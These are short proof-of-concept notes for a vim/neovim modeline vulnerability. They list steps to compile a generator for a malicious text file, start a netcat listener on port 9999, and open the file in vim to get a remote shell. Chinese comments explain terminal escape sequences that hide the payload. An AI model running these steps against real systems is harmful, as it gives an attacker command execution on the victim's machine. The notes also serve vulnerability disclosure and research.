This CVE was fixed after neovim 0.3.6 and vim 8.1.1365
vim demo1.txt
- Create malware text file:
gcc make_demo3.c -o make_demo3
./make_demo3
- Build client in another session:
nc -vlp 9999
- Open malware file:
vim demo3.txt
And then, you can execute any linux commands in the session.
\x1b[?7l
: 輸出到行末時不換行, 持續覆蓋最後一個字元\x1bS
: STS, Set transmit state\x1b[1G
: 移動到column 1\x1b[K
: 刪除從目前游標位置至行末的所有字元